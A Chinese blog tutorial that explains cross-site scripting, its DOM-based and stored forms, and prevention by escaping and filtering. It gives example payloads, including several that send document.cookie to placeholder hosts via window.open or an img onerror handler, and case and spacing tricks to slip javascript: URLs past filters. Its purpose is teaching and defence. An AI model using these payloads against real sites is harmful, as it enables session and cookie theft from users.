日拱一卒 | 什么是XSS 攻击,预防

最新推荐文章于 2024-03-24 10:47:27 发布
最新推荐文章于 2024-03-24 10:47:27 发布
阅读量173 收藏
点赞数
分类专栏: 日拱一卒 文章标签: xss 安全 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42388292/article/details/117792997
版权
XSS 攻击,即跨站脚本攻击(Cross Site Scripting),它是 web 程序中常见的漏洞。

原理

攻击者往 web 页面里插入恶意的 HTML 代码(Javascript、css、html 标签等),当用户浏览该页面时,嵌入其中的 HTML 代码会被执行,从而达到恶意攻击用户的目的。如盗取用户 cookie 执行一系列操作,破坏页面结构、重定向到其他网站等。

种类

1、DOM Based XSS:基于网页 DOM 结构的攻击

例如:

  • input 标签 value 属性赋值
//jsp
<input type="text" value="<%= getParameter("content") %>">

访问

http://xxx.xxx.xxx/search?content=<script>alert('XSS');</script>    //弹出 XSS 字样
http://xxx.xxx.xxx/search?content=<script>window.open("xxx.aaa.xxx?param="+document.cookie)</script>    //把当前页面的 cookie 发送到 xxxx.aaa.xxx 网站
  • 利用 a 标签的 href 属性的赋值
//jsp
<a href="escape(<%= getParameter("newUrl") %>)">跳转...</a>

访问

http://xxx.xxx.xxx?newUrl=javascript:alert('XSS')    //点击 a 标签就会弹出 XSS 字样
变换大小写
http://xxx.xxx.xxx?newUrl=JAvaScript:alert('XSS')    //点击 a 标签就会弹出 XSS 字样
加空格
http://xxx.xxx.xxx?newUrl= JavaScript :alert('XSS')    //点击 a 标签就会弹出 XSS 字样
  • image 标签 src 属性,onload、onerror、onclick 事件中注入恶意代码
<img src='xxx.xxx' onerror='javascript:window.open("http://aaa.xxx?param="+document.cookie)' />
2、Stored XSS:存储式XSS漏洞
<form action="save.do">
	<input name="content" value="">
</form>

输入 <script>window.open("xxx.aaa.xxx?param="+document.cookie)</script>,提交
当别人访问到这个页面时,就会把页面的 cookie 提交到 xxx.aaa.xxx,攻击者就可以获取到 cookie

预防思路
  • web 页面中可由用户输入的地方,如果对输入的数据转义、过滤处理
  • 后台输出页面的时候,也需要对输出内容进行转义、过滤处理(因为攻击者可能通过其他方式把恶意脚本写入数据库)
  • 前端对 html 标签属性、css 属性赋值的地方进行校验
注意:

各种语言都可以找到 escapeHTML() 方法可以转义 html 字符。

<script>window.open("xxx.aaa.xxx?param="+document.cookie)</script>
转义后
%3Cscript%3Ewindow.open%28%22xxx.aaa.xxx%3Fparam%3D%22+document.cookie%29%3C/script%3E

需要考虑项目中的一些要求,比如转义会加大存储。可以考虑自定义函数,部分字符转义。

日拱一卒z
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
预防XSS攻击和SQL注入XssFilter
05-19
一、什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如...
预防xss攻击,过滤标签.js
04-01
预防xss攻击,过滤标签.js
别做操之过急的”无效将军”,做实实在在的”
沈逸的IT专栏---shenyisyn
05-14 9944
前天在网上看到一句话很不错,拿来和大家分享,同时用我的“大叔”三观来解读这句话。这句话是:“我们不需要操之过急的”无效将军”,我们需要实实在在的””。这句话翻译成常用语的话来自于一句很经典的语句:纵使一年不将军,不可一。此句来源于中国象棋:       将军:象棋中向对手发出可能产生“致命”的一招。这个词一般描绘象棋者比较高大上的情形。       :下过象棋的人应该知道,有
Linux命令 -
daigz1224
06-08 290
chmod +x filename # 添加执行权限 tar zxvf filename.tar.* # 解压 unzip filename.zip # 解压 ifconfig | grep “inet ” | grep -v 127.0.0.1 # 查看 ip
XSS四-WEB攻防-XSS跨站&CSP策略&HttpOnly属性&Filter过滤器&标签闭合&事件触发
最新发布
zyw268的博客
03-24 295
特征码定位&汇编或源码修改。C2远控-EXE处理。C2远控-EXE处理。
(三十六)
iplayvs2008的专栏
04-07 743
备忘录模式(Memento):在不破坏封装性的的前提下,捕获一个对象的内部状态,并在该对象之外保存这个状态,这样以后就可将该对象恢复到原先保存的对象。                                 白话:备忘录模式好比游戏中的备份,记录了以前的状态,用于状态出错时恢复使用。 角色:(1)原发器(Originator):需要被备忘存档的对象。   (2)备忘录(Memento
,功不唐捐
u011073567的博客
02-24 5459
,功不唐捐。“功不唐娟”是佛经里说的话,唐捐的意思就是白费了,泡汤了。功不唐捐是指努力绝不白费,绝不泡汤。 在个人学习成长领域,正确理解“”的概念很重要,能帮助我们审视自己所做的事,合理看待当前的事情,并合理预估未来的结果。 中国象棋里的“”,一次只能走一步,他不像“车”、“马”等一次可以走多步。这个“”,时间长了,再小的进步也会产生价值,这是基本的意义所在。 人们往
——LeetCode 844.比较含退格的字符串
冢狐的私人空间
10-19 316
大家好呀,今天为大家带来的LeetCode的题目是LeetCode 844.比较含退格的字符串。算是一道比较基础的题目。 题目 分析 这道题目相对简单,主要就是将时间复杂度和空间复杂度降低下来。 解法一:重构字符串 最简单的思路,就是按照题目的描述,将这两个字符串变为一般形式,然后直接比较是否相等即可。 解法二:双指针 由于一个字符是否存活要取决于后面是否有退格符,所以我们只需要要逆序遍历字符串,然后就可以得到一般字符串然后比较是否相等。 代码实现 解法一: public boolean backspac
关于pdf文件xss攻击问题,配置xssFilter方法
12-21
所有需要的文件均在里面,超有所值
java 预防XSS攻击
08-23
Java开发项目,预防XSS攻击后台编写
,“功不唐捐
shendeguang的专栏
04-12 2415
据说,世界上只有两种动物能够登上金字塔顶,一种是老鹰,一种是蜗牛。他们是如此不同,老鹰矫健,敏捷,蜗牛弱小,迟钝,可是蜗牛仍然与老鹰一样能达到金字塔顶端。它凭的就是永不停息的执着精神。      “”,的意思是:每天像个子一样前进一点点。“功不唐捐”是佛经里说的话,唐捐的意思就白费了,泡汤了。功不唐捐是指努力绝不白费,绝不泡汤。      朱学勤先生说过一句话:宁可十年不将军
乐刻运动年陈文化中的那六个成语解析:,功不唐捐|筚路蓝缕 &玉汝于成|有梦可依,未来可期
热门推荐
長い冬が越さなければ春が来ない。
04-24 2万+
一、,功不唐捐(一周年) 解读:这一年,乐刻的新人伙伴历经变化,迎接挑战,在压力中痛苦成长。每天坚持,点滴进步,努力绝不白费,在我们看不见想不到的时候,种下的种子终将开花结果。 “无有尽,功不唐捐终入海”是“锲而不舍,天道酬勤”,勉励人们勤奋进取的意思。有名言:宁可十年不将军,不可一。只要勤奋努力、坚持不懈,每天像个子一样前进一点点、进步一点点,终会有所成就。唐,白白...
.操作系统基础知识点梳理
Duke8888的博客
01-02 378
课程知识概述部分 磁盘管理体系结构 磁盘创建文件系统 磁盘挂载操作 (mount 参数信息) ! 磁盘应用环境 (作为交换分区) ! 系统启动流程 基础节点知识梳理 课程知识回顾说明 操作系统磁盘分区: fdisk parted 磁盘逻辑管理说明: RAID LVM 磁盘创建文件系统 文件系统概念: 存储数据不同机制 常见文件系统: ext3/ext4(存储效率) ...
ABP框架系列之五十四:(XSRF-CSRF-Protection-跨站请求伪造保护)
weixin_33827731的博客
01-16 958
Introduction "Cross-Site Request Forgery (CSRF) is a type of attack that occurs when a malicious web site, email, blog, instant message, or program causes a user’s web browser to perform an unwanted ...
一个危险的XSS案例——轻松拿到登录用户的cookie
dengrong8117的博客
06-06 1306
casperchen from IMWeb Team. 站酷是我很喜欢的设计类站点,上面有我大二美好的回忆,卖个广告,我的个人主页是:http://www.zcool.com.cn/u/346408 很好,其实上面不是重点。这段时间周围出现了好几单安全相关的问题,基本都是XSS漏洞导致的。于是内心一直惦记着,包括上个周末在逛站酷的时候,然后突发奇想:站酷上是否也存在XSS...
ABP官方文档(四十二)【CSRF和XSRF保护】
极客神殿
11-05 3640
6.9 CSRF和XSRF保护6.9.1 简介Cross-Site Request Forgery (CSRF) 跨站请求伪造是一种攻击,发生在具有恶意的网站,email,blog,即时消息,或者程序导致用户的web浏览器在一个受信用的网站去执行了某个有害的行为来获取当前用户的认证信息,详细了解请点击这里脑补。在ASP.NET Web API官网也有如何实现的简短描述。ABP框架尽可能的简化且自动化
前端须知的xss攻击
zhangyizuishuai的博客
11-04 399
xss攻击 用户在表单中输入JavaScript脚本,以及a标签并且a标签内部嵌套一个img标签,通过这种方式获取用户的cookie或者写循环导致用户页面卡顿。 在提交表单的时候,如果用户在文本框内输入了循环的脚本,比如写了一个定时器死循环,这样把js代码发送到后端或者前端运行的话会导致服务器消耗性能或者前端网页卡顿 一般解决这个问题的话,我们前端解决的方案就是编译提交文本框的内容,并且把js脚本转化为文本的形式,或者把一些关键字比如 ...
EA&UML-添加类属性
面向对象思考
03-30 4458
添加属性并设定属性的属性!
XSS(href输出,js输出)防范措施
qq_43814486的博客
05-05 8821
防御总的原则:根据实际情况对输入做过滤,对输出做转义 href输出漏洞:输出出现在a标签的href属性里面,可以使用javascript协议来执行js 后端: $message=htmlspecialchars($_GET['message'],ENT_QUOTES); $html.="<a href='{$message}'> 可以看到,虽然对htmlspecialchars()...
什么是 XSS 攻击?如何预防
05-16
XSS(Cross-Site Scripting)攻击是一种常见的Web应用程序安全漏洞,攻击者通过在Web应用程序中注入恶意脚本,使得这些脚本在用户浏览网页时执行,从而窃取用户的敏感信息或者实施其他恶意行为。 为了预防XSS攻击,可以采取以下几种措施: 1. 对用户输入进行过滤和验证:在Web应用程序中,对所有输入的数据进行过滤和验证,防止恶意脚本被注入。可以使用一些开源的XSS过滤器,如ESAPI和HTML Purifier。 2. 对输出进行编码:在Web应用程序中,对所有输出的数据进行编码,防止恶意脚本被执行。可以使用一些编码工具,如HTML Entity编码和JavaScript编码。 3. 使用HttpOnly Cookie:HttpOnly Cookie只能通过HTTP协议进行访问,不能通过JavaScript进行访问,防止恶意脚本窃取Cookie信息。 4. 设置CSP(Content Security Policy):CSP是一个安全策略,可以限制Web应用程序中的资源加载和脚本执行,防止恶意脚本被注入和执行。 5. 使用HTTPS协议:HTTPS协议可以加密通信内容,防止敏感信息被窃取和篡改。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值